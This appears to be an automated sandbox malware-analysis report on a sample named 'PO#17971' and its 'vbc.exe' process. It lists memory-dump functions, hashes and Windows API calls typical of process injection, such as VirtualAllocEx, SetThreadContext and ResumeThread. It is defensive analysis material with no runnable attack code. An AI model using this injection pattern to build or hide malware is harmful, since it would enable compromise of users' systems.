Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a7f5a8796e61a257c071211f3efc95c2e2e931f09aabe6186e83c41c1003028b
Instruction ID: d0b3a7b8ccdcda45acb51e49671deec2fa21fa74307a194b6f76fd0e285fcfcf
Opcode Fuzzy Hash: a7f5a8796e61a257c071211f3efc95c2e2e931f09aabe6186e83c41c1003028b
Instruction Fuzzy Hash: 1F2138B1D002098FDB14DFAAC4847EFBBF5EF88314F14842AD559A7244CB78A985CFA0

Function 07249FB8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0724A038

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 30e3648abb9467bbdfc6cb94991f6ea20ee76b562beaf5d528e0fbc925246372
Instruction ID: 43776c6893b15a97c006768581768e5b54f431c76fba1ca1f3365a8a55511c57
Opcode Fuzzy Hash: 30e3648abb9467bbdfc6cb94991f6ea20ee76b562beaf5d528e0fbc925246372
Instruction Fuzzy Hash: FD2137B1C003499FCB10DFAAC884AEEFBF5FF48310F50842AE519A7240C7799941CBA0

Function 07249D30 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07249DAE

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 60cf9c7bd8ca461b604cb6fecac4f23e38d4762661500be963cac8701aae1ca6
Instruction ID: c747f38defd992ebe283a1f0ed93daf99ca17ca5d4a8f860bcde47d496bb23ea
Opcode Fuzzy Hash: 60cf9c7bd8ca461b604cb6fecac4f23e38d4762661500be963cac8701aae1ca6
Instruction Fuzzy Hash: C22118B19002099FDB14DFAAC4857EFBBF4EF48314F14842AD559A7244CB78A985CFA1

Function 02A2E000 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A2E087

Memory Dump Source

Source File: 00000000.00000002.2086122600.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a20000_PO#17971.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9b0386b8623bfc467e31887847530387b8ba44e036bb261a54436f48d5a96318
Instruction ID: 9018e0336623d191b83b7a78cb1fe795548f6dda1478141372fc816d55f9eb3f
Opcode Fuzzy Hash: 9b0386b8623bfc467e31887847530387b8ba44e036bb261a54436f48d5a96318
Instruction Fuzzy Hash: B121C4B59002589FDB10CFAAD584ADEBFF9FB48310F14841AE918A3350D779A944CFA5

Function 07102564 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07104862,?,?,?,?,?), ref: 07104907

Memory Dump Source

Source File: 00000000.00000002.2093816240.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO#17971.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 3817107de3f933cc600fc459e79b203c4a247dd86fa54414c0850459e128c551
Instruction ID: daa94a3ba0a4a43521ec626811d8d043bd93058af027a306bd837db5a6df3f5b
Opcode Fuzzy Hash: 3817107de3f933cc600fc459e79b203c4a247dd86fa54414c0850459e128c551
Instruction Fuzzy Hash: 62113AB58003499FDB10DF9AD944BDEBFF8EB49310F14841AEA14A7250C379A950DFA5

Function 07249E01 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07249E76

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f83a3d837e6810cac906a843f4a240b01aa7a133815e3a4b67cd4db04be9f1f1
Instruction ID: 76d669ab3ce881d6a0b2b0f481a46fa19a9d257a7679ba6b52a8ae3cf1e603d7
Opcode Fuzzy Hash: f83a3d837e6810cac906a843f4a240b01aa7a133815e3a4b67cd4db04be9f1f1
Instruction Fuzzy Hash: 10113AB29042499FDB10DFAAC844AEFBFF5EF88310F24841AD559A7250C775A944CFA1

Function 07249E08 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07249E76

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 98bec73fe16decfa4ca1f580d354142545811aeb1ae727b310eab3cd7e55aad7
Instruction ID: ed51e28cf1ab392ce221ab60b9ec2a64a17827513a11e05965f83b733676afd5
Opcode Fuzzy Hash: 98bec73fe16decfa4ca1f580d354142545811aeb1ae727b310eab3cd7e55aad7
Instruction Fuzzy Hash: C0113AB19002499FCB10DFAAC844ADFBFF5EF48310F10841AD519A7250C775A544CFA1

Function 07249C79 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07249CE2

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5d741e787bcf31fc7e243ccb623ed3168ff3c66b1166f439c9f882e986319d1b
Instruction ID: 10fdc6727cb0f8a1904f560a264ed2922732febf41133e9f6de9ace65c2773d6
Opcode Fuzzy Hash: 5d741e787bcf31fc7e243ccb623ed3168ff3c66b1166f439c9f882e986319d1b
Instruction Fuzzy Hash: DB115BB1D002498FDB24DFAAC4447EFFBF5AF88314F20841AC45AA7250CB79A940CF90

Function 07249C80 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07249CE2

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1ff43d9ea6d0cc5d14e7ac7571d468315ded7f18211febf9a826c50c0d3d2f3f
Instruction ID: a48cda4a7ac8fb3fbaa5a896c64075c61905294da2b4ee3227e673f1a57c32dd
Opcode Fuzzy Hash: 1ff43d9ea6d0cc5d14e7ac7571d468315ded7f18211febf9a826c50c0d3d2f3f
Instruction Fuzzy Hash: F4112BB19002498BCB24DFAAC4457DFFBF5EF48314F108419D519A7240CB79A544CFA0

Function 02A2BD20 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02A2BD86

Memory Dump Source

Source File: 00000000.00000002.2086122600.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a20000_PO#17971.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c9fe6443e772a0a8769ac6672a321cdb5839ba6f2b63de69bb94e9e45675f3cb
Instruction ID: a63c5160170002f0c02ff8ff4e76507e310986e75c40b31f5adb840867d2e4e3
Opcode Fuzzy Hash: c9fe6443e772a0a8769ac6672a321cdb5839ba6f2b63de69bb94e9e45675f3cb
Instruction Fuzzy Hash: 3511FDB68003498FCB20DF9AD444ADEFBF4EF88224F10841AD429A7210C379A545CFA1

Function 0724A1B0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0724EA1D

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7fd65249ec6fe35a091e5b81a6173f35413ca4ef6cc78082e4f3949990f482ab
Instruction ID: 192be5f8aa846520dece9d6015804cb9b7a7c55c601a55077c6f53c7b6398fc4
Opcode Fuzzy Hash: 7fd65249ec6fe35a091e5b81a6173f35413ca4ef6cc78082e4f3949990f482ab
Instruction Fuzzy Hash: CC11E3B58002499FDB10DF99D444BDEBBF8FB48310F108419E519A7200C375A944CFA1

Function 010DD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085536117.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10dd000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6818709ba9d588d98fc6cf98bf65f566d01e02b4dd06d6d523a9da86ed651d
Instruction ID: 9a7904fa8daf8be79e7fd320d278bf73eec158df3f8f33e8a95f5e2b09a754fe
Opcode Fuzzy Hash: 4d6818709ba9d588d98fc6cf98bf65f566d01e02b4dd06d6d523a9da86ed651d
Instruction Fuzzy Hash: F0213A71540340DFDB15DF58D9C0F2ABFA5FB88318F60C5A9D9490B29AC33AD456CBA1

Function 010ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085617295.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10ed000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 726f1458932393d82291f92a4d090414714b48280ec6836300aa0043d7f56be2
Instruction ID: 01af1e3fb8f514865df9ec75464c24ad2774a619ede0321ea03a04bca970298a
Opcode Fuzzy Hash: 726f1458932393d82291f92a4d090414714b48280ec6836300aa0043d7f56be2
Instruction Fuzzy Hash: 49212571604200DFCB15DF68D588B16BFE5FB84314F28C5ADE9890B256C33AD407CB61

Function 010ED1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085617295.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10ed000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db2feefc8b8a444ead5e911d182c507556241d1bea17fb5f537b975527d90f35
Instruction ID: c8a4e592fb9797847e87fb7450b127c48b15b4c2f8284da1538453ae8cf57d36
Opcode Fuzzy Hash: db2feefc8b8a444ead5e911d182c507556241d1bea17fb5f537b975527d90f35
Instruction Fuzzy Hash: 38213771504200EFDB05DFA9D5C8F26BBE5FB94324F20C5ADD9894B292C33AD406CB61

Function 010ED006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085617295.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10ed000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abbb95b2db24be9c731221642a8e9a786d331357ba67601458f9a9b12d8617b5
Instruction ID: 0dd762e0d7ac707259e04f6a97e053007c57851d98fb4214def597a086a8fedb
Opcode Fuzzy Hash: abbb95b2db24be9c731221642a8e9a786d331357ba67601458f9a9b12d8617b5
Instruction Fuzzy Hash: E02184755093808FDB13CF64D994715BFB1FB46214F28C5DAD8898F6A7C33A980ACB62

Function 010DD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085536117.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10dd000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 78c637585ee52f1caa0c12ab7694c439a3462908254b1dcce33995faed89fe7e
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: F611DF72404280CFCB12CF54D5C4B16BFB1FB88314F24C6A9D9490B25AC336D45ACBA2

Function 010ED1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085617295.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10ed000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 8ccae95f4dafc723e92d08c9ef7d51a567f6d9ccb5e156b474cfa27d5f334aa8
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 5711BB75504280DFDB06CF54C5C8B15BFA1FB84224F24C6AED8894B296C33AD40ADB62

Function 010DD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085536117.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10dd000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40aa78a36d0644e732e711802e83cc118ad7b2bf1f9552090d1065e1435aaaf1
Instruction ID: 5ef913378713687bcbcd8c2e2df24b20550a80342ae2e7373be88066039cea85
Opcode Fuzzy Hash: 40aa78a36d0644e732e711802e83cc118ad7b2bf1f9552090d1065e1435aaaf1
Instruction Fuzzy Hash: 99012B310043809AE7208E99CD84B6BBFDCFF45320F18C5AAED480A2C6E2399800CBB1

Function 010DD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085536117.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10dd000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13dae045bb81fc0e00081d35b8df22f714a14397d1870d906b8394e97bf72c9a
Instruction ID: f86becb924dbd17c6d23b5b9aac3a954e3f13329524322f8a3f0582b647d1630
Opcode Fuzzy Hash: 13dae045bb81fc0e00081d35b8df22f714a14397d1870d906b8394e97bf72c9a
Instruction Fuzzy Hash: 2DF062714043849AE7218E1AD888B67FFE8FF95634F18C49AED484A286D2799844CBB1

Non-executed Functions

Function 0710E5FE Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

4']q, xrefs: 0710E70A

Memory Dump Source

Source File: 00000000.00000002.2093816240.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO#17971.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: ecce1609ef0f48e2a364cfde1b89d9c04afce2ce399d2a1696a55f3e386ffa91
Instruction ID: c21bf4182867ce33f48c9a3f0a9b8d25bb2f555468190a4663719c3c430f94b1
Opcode Fuzzy Hash: ecce1609ef0f48e2a364cfde1b89d9c04afce2ce399d2a1696a55f3e386ffa91
Instruction Fuzzy Hash: 79715C749156458FD70EDF7AE8A169ABFF3FF94200F04C56AD004DB269DB744806CB61

Function 0710E62B Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

4']q, xrefs: 0710E70A

Memory Dump Source

Source File: 00000000.00000002.2093816240.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO#17971.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: b03ffe73c79c4a919f35b879f277392568d68c169ad775c97c0fe96349dcc374
Instruction ID: 3af10c37d4d8b05da2c676d5c44b61a09b9ce9d53386e6c2e3b5f93f4132b935
Opcode Fuzzy Hash: b03ffe73c79c4a919f35b879f277392568d68c169ad775c97c0fe96349dcc374
Instruction Fuzzy Hash: 74714C749156058FDB0DDF6AE8A1A9ABFF3FF98700F04C52AD004DB269DB745806CB51

Function 0710E638 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4']q, xrefs: 0710E70A

Memory Dump Source

Source File: 00000000.00000002.2093816240.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO#17971.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: bd8ef5005f84906bab4c8e98a19db04a712f9526ef329f69a53846d04d351964
Instruction ID: 10116750f6b0d63b39e3f6b9aceaa043fadb12ae536bf27abc050de656b1210b
Opcode Fuzzy Hash: bd8ef5005f84906bab4c8e98a19db04a712f9526ef329f69a53846d04d351964
Instruction Fuzzy Hash: 14612A74A156058FDB0DEF6AE8A1A9ABFF3FF98700F14C529D004DB269EB745806CB50

Function 07247510 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ca2fff5a6ae8a9d8f8f1d8f581a1121639c6b8cf9e55e30ec84f837d46f47b2
Instruction ID: 7a92debedb94b47932dd227a0938de5ebc81b1b6bee311bb1930aa2ae38a7439
Opcode Fuzzy Hash: 4ca2fff5a6ae8a9d8f8f1d8f581a1121639c6b8cf9e55e30ec84f837d46f47b2
Instruction Fuzzy Hash: 0AE1D7B4E101198FCB18DFA9C5809AEBBF2BF89305F248169D815AB356D730AD41CF61

Function 07249458 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b00c3c237da62e0c5593a0ac2588d230e7da42fbb6710d5554330c2788ed08e
Instruction ID: aebb9e31339cd94acb2859560cc58f5de0e7dfdb72c941c8b490831147e86f80
Opcode Fuzzy Hash: 1b00c3c237da62e0c5593a0ac2588d230e7da42fbb6710d5554330c2788ed08e
Instruction Fuzzy Hash: 92E11AB4E101198FCB14DFA8C580AAEFBF2BF89305F248169D855AB356D731AD81CF61

Function 072481B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a29ab39472468efa61407d6b6372aeaef67dfb2277337b1d771887046b8f6023
Instruction ID: 2a083ed78c6de83efce80cd06b0ed1d7cc5a75641421eec4649553c1806dc0b0
Opcode Fuzzy Hash: a29ab39472468efa61407d6b6372aeaef67dfb2277337b1d771887046b8f6023
Instruction Fuzzy Hash: 1FE1D9B4E201198FCB18DFA9C5809AEFBF2BF89305F248169D815AB356D731AD41CF61

Function 07247D80 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20472fef302958e25e52f402a4ee015d12f188abcd97c1cfe24ed6f4655f20fb
Instruction ID: 4fd3475dc7547608b1d6f4874936bdc8731e6b900cfa9622323f54763950fdb4
Opcode Fuzzy Hash: 20472fef302958e25e52f402a4ee015d12f188abcd97c1cfe24ed6f4655f20fb
Instruction Fuzzy Hash: A8E1C9B4E201198FCB18DFA9C5809AEBBF2FF49305F248159D815A7356D731AD41CF61

Function 07247948 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea10e2ddd83db7a8e353a558a97ab940b709f8e16119de76d2cf9e5d5498fbe0
Instruction ID: 8dcb3c61c6e65f029f32ad2453f623cc44cd86db0f77f15487a8955b0671ff5e
Opcode Fuzzy Hash: ea10e2ddd83db7a8e353a558a97ab940b709f8e16119de76d2cf9e5d5498fbe0
Instruction Fuzzy Hash: 10E1B8B4E101198FCB18DFA9C5809AEBBF2FF89305F248169D815AB356D731AD41CFA1

Function 0710F848 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093816240.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334446f789a801f31d959bdd20fbfbb7f7843c29c366e93f7705aaf12c31fc50
Instruction ID: 962de5dabea7d141634b2e5465d73932125b398c3a0ac1059733d6eb7c34dc8f
Opcode Fuzzy Hash: 334446f789a801f31d959bdd20fbfbb7f7843c29c366e93f7705aaf12c31fc50
Instruction Fuzzy Hash: B091D3B1D0521DDFDB28DFAAC4467EDBBB5BB49300F10806AE419B7291DBB44986CF80

Function 072474F2 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d178d3cf48e92f2154ac7e33396553c2c81d1742e3d745e4dbf56fb4a439ee
Instruction ID: 30a7ea15b3c7b129c7bfbc5dbcc93fd2f23503654e892a25a75924db5cc50573
Opcode Fuzzy Hash: e3d178d3cf48e92f2154ac7e33396553c2c81d1742e3d745e4dbf56fb4a439ee
Instruction Fuzzy Hash: D5510BB5E102198FDB18DFA9C5805AEFBF2BF89305F248169D818AB356D7309941CFA1

Function 07247D70 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc82765c16d25eed078294b7d5b88e95edf05b9e133d244ddf1aabedc0dce986
Instruction ID: b2884b5de24a1b738c40788c087b120d98791ec4b07a96dbdcfd2aafc0d3c201
Opcode Fuzzy Hash: dc82765c16d25eed078294b7d5b88e95edf05b9e133d244ddf1aabedc0dce986
Instruction Fuzzy Hash: 98510BB4E102198FCB18DFA9C5805AEBBF2BF89304F24C169D418AB356D7319D41CFA1

Function 072481A9 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2093997543.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_PO#17971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb6f9341fb11381288ca9d16285d4e0a165c00aad304bd212ed86b274a35c03
Instruction ID: 91296ff46feb39ad30445800192a8ea1bd1fd91885f43f944ae07a572ab2e423
Opcode Fuzzy Hash: 8bb6f9341fb11381288ca9d16285d4e0a165c00aad304bd212ed86b274a35c03
Instruction Fuzzy Hash: FF510DB5E102198FDB18DFA9C5805AEFBF2BF89305F24C169D418AB356D7309A41CFA1

Analysis Process: vbc.exePID: 7192, Parent PID: 428COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	25.6%
Signature Coverage:	19.6%
Total number of Nodes:	219
Total number of Limit Nodes:	23

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

x, xrefs: 00401E69
4, xrefs: 00401B64
v, xrefs: 0040212C
o, xrefs: 00402097
U, xrefs: 004020F5
[, xrefs: 00402047
W, xrefs: 00402033
*, xrefs: 00401A1F
0, xrefs: 00401BBD
[, xrefs: 00401B37
v, xrefs: 0040206A
o, xrefs: 00402159
{, xrefs: 00401B4B
x, xrefs: 00401B78
x, xrefs: 0040214A
{, xrefs: 0040211D
*, xrefs: 004020E1
", xrefs: 00401B0F
!, xrefs: 0040201A
W, xrefs: 004020E6
4, xrefs: 00402074
W, xrefs: 00401B14
v, xrefs: 00401E4B
., xrefs: 0040201F
E, xrefs: 00401E0F
o, xrefs: 00401B8D
5, xrefs: 00402109
V, xrefs: 00401E19
8, xrefs: 00401BA9
h, xrefs: 00401A6F
., xrefs: 00401B0A
', xrefs: 00402006
:, xrefs: 00401B28
v, xrefs: 00401B5A
W, xrefs: 00401B23
4, xrefs: 00402136
), xrefs: 0040202E
!, xrefs: 00401B1E
_._, xrefs: 00402257
!, xrefs: 004020CF
___, xrefs: 0040227D
V, xrefs: 00402038
', xrefs: 00401AF6
6, xrefs: 004020C5
x, xrefs: 00402088
{, xrefs: 0040205B
%, xrefs: 004020FA
{, xrefs: 00401E3C
D, xrefs: 00401DFB

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
